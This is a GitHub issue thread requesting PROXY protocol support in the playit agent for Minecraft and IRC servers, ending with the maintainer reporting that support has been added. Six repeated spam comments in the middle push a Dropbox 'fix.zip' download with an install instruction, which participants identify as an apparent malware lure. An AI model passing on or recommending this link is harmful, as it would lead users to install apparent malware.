### ISSUE TITLE
feature request: PROXY protocol support

### ISSUE THREAD

**Issue by slingamn** [playit-cloud/playit-agent#93]
HAProxy's [PROXY protocol](https://www.haproxy.org/download/1.8/doc/proxy-protocol.txt) is a de facto standard for passing client IP information through a reverse proxy. From a [support thread](https://discuss.playit.gg/t/is-there-proxy-protocol-or-other-ip-forwarding-method-for-bungeecord/1260/4), playit.gg users seem interested in using it with [SpigotMC/BungeeCord](https://github.com/SpigotMC/BungeeCord), a popular Minecraft implementation that supports it. I maintain an ircd implementation and got some interest in it as well: https://github.com/ergochat/ergo/issues/2188

I looked a little at playit-agent to see how this might be implemented. It sounds like the per-tunnel configuration lives on the server side? So it seems like the natural implementation might be purely server-side: the user gets a checkbox to select whether to enable the PROXY protocol, and then the server simply sends the PROXY header as the initial data on the proxied TCP connection.

Thanks very much for your time.

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by loriopatrick** [comment]
@slingamn do you know what’s up with all the spam comments? Looks really sus. I’m going to delete them.

**Comment by loriopatrick** [comment]
This is something I would like to add, I have an early branch started locally and someone from our Discord has also been tackling an early implementation.

**Comment by slingamn** [comment]
Very cool! (Yeah, no clue about the spam comments, I assume these are bots trying to trick people into installing malware.)

**Comment by aikooo7** [comment]
Any progress?

**Comment by aikooo7** [comment]
@loriopatrick ping just to know if any progress is done? This is a such a needed feature to me

**Comment by loriopatrick** [comment]
Support for tcp added in 0.15.24 and support for udp in 0.15.26

**Comment by aikooo7** [comment]
> Support for tcp added in 0.15.24 and support for udp in 0.15.26

I didn't know that since I wasn't running the software while waiting for this feature.

THANK YOU SO MUCH, this is such a deal breaker, mainly if you see that ngrok only allows this in their Enterprise while this solution is free, thank you :)
